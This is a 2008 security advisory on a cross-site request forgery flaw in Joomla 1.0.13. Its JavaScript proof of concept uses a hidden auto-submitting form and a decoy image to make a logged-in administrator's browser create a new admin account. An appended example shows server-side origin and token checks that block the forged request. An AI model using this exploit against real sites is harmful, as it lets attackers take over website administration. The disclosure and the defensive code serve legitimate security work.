
joomla1013-csrf.txt

Date: 08 Jan 2008 00:00:00
Reported by: J. Carlos Nieto
Type: packetstorm
Source: packetstormsecurity.com

Joomla 1.0.13 CSRF vulnerability

Code
`Author: Jose Carlos Nieto.  
  
Date: Jan 08, 2008  
  
Severity: Mild  
  
There exists a Cross Site Request Forgery security hole in Joomla 1.0.13.  
  
  
Background  
==========  
  
*Joomla!* is a free <http://en.wikipedia.org/wiki/Free_software>, open source <http://en.wikipedia.org/wiki/Open_source_software> content management system <http://en.wikipedia.org/wiki/Content_management_system> for publishing content  
on the world wide web <http://en.wikipedia.org/wiki/World_wide_web> and intranets <http://en.wikipedia.org/wiki/Intranet>.  
Joomla! is licensed under the GPL <http://en.wikipedia.org/wiki/GNU_General_Public_License>, and is the result of a fork <http://en.wikipedia.org/wiki/Fork_%28software_development%29> of Mambo <http://en.wikipedia.org/wiki/Mambo_%28CMS%29>.  
  
  
Severity  
========  
Mild. It requires an administrator to be logged in and to be tricked into visiting a specially  
crafted webpage.  
  
  
Summary  
=======  
Joomla! has no CSRF protection. A malicious user can trick an administrator into viewing  
a specially crafted webpage containing an exploit. This exploit can execute (without permission)  
any command the administrator would normally execute, such as publishing content or even adding a new  
administrator.  
  
  
Solution  
========  
This problem has no solution at this time.  
  
  
Disclosure timeline  
===================  
Oct 18 2007 - Vulnerability found.  
Oct 18 2007 - Vulnerability reported to vendor.  
Oct 18 2007 - Answer from vendor.  
Jan 08 2008 - Advisory released.  
  
  
Proof of Concept  
================  
  
If a logged-in administrator visits this page, a new administrator will be added to the victim's  
Joomla-powered website.  
  
---- exploit code ----  
  
<script type="text/javascript">  
window.onload = function() {  
    var url = "http://joomlasite.com/joomla/administrator/index2.php";  
  
    var gid = 25;  
    var user = 'custom_username';  
    var pass = 'custom_password';  
    var email = '[email protected]';  
  
    var param = {  
        name: user,  
        username: user,  
        email: email,  
        password: pass,  
        password2: pass,  
        gid: gid,  
        block: 0,  
        option: 'com_users',  
        task: 'save',  
        sendEmail: 1  
    };  
  
    var form = document.createElement('form');  
    form.action = url;  
    form.method = 'post';  
    form.target = 'hidden';  
    form.style.display = 'none';  
  
    for (var i in param) {  
        try {  
            // ie  
            var input = document.createElement('<input name="'+i+'">');  
        } catch(e) {  
            // other browsers  
            var input = document.createElement('input');  
            input.name = i;  
        }  
        input.setAttribute('value', param[i]);  
        form.appendChild(input);  
    }  
    document.body.appendChild(form);  
  
    form.submit();  
}  
</script>  
  
<iframe name="hidden" style="display: none"></iframe>  
  
<img src="http://www.more4kids.info/uploads/Image/Carebears-Cover.jpg">  
  
---- exploit code ----  
  
`
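
The Summary states that Joomla! 1.0.13 performs no CSRF check, which is why the cross-site form post in the proof of concept is accepted. The block below is an added example, not code from the advisory or from Joomla: a server-side check that rejects that request by validating the request's source origin and a per-session token. The `csrf_token` field name, the session object shape, the `attacker.example` host and the sample token are assumptions constructed for illustration.

```javascript
// Added example, not Joomla code. SITE_ORIGIN reuses the host from the PoC URL;
// the csrf_token field and the session object shape are assumptions.
const SITE_ORIGIN = 'http://joomlasite.com';

// Compare without an early exit so timing does not leak matching prefixes.
function safeEqual(a, b) {
  if (typeof a !== 'string' || typeof b !== 'string' || a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// Origin of the page that sent the request: Origin header, else Referer.
// Returns null when both are absent, 'invalid' for "null" or unparseable values.
function sourceOrigin(headers) {
  const raw = headers.origin || headers.referer;
  if (!raw) return null;
  try { return new URL(raw).origin; } catch (e) { return 'invalid'; }
}

// Decide whether a state-changing admin request may proceed.
function checkAdminRequest(req, session) {
  if (req.method !== 'POST') return 'reject: state change requires POST';
  const src = sourceOrigin(req.headers);
  if (src !== null && src !== SITE_ORIGIN) return 'reject: cross-origin source';
  // Headers can be absent, so the per-session token is always required.
  if (!session || !safeEqual(req.body.csrf_token, session.csrfToken)) {
    return 'reject: bad or missing token';
  }
  return 'accept';
}

// Constructed sample data: fields the PoC form posts, and a session token that
// a real server would draw from a CSPRNG at login and embed in its own forms.
const sampleSession = { csrfToken: '3f9a1c0e7b5d4a2896e1f0c4d7b8a5e2' };
const pocBody = { option: 'com_users', task: 'save', username: 'custom_username', gid: '25' };
const forged = { method: 'POST', headers: { origin: 'http://attacker.example' }, body: pocBody };
const forgedNoHeaders = { method: 'POST', headers: {}, body: pocBody };
const genuine = {
  method: 'POST',
  headers: { referer: SITE_ORIGIN + '/joomla/administrator/index2.php' },
  body: Object.assign({ csrf_token: sampleSession.csrfToken }, pocBody)
};

for (const [label, req] of [['forged', forged], ['forged, no headers', forgedNoHeaders], ['genuine', genuine]]) {
  console.log(label + ': ' + checkAdminRequest(req, sampleSession));
}
```

The forged post fails even when the browser omits both headers, because the attacking page cannot read the token bound to the administrator's session.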
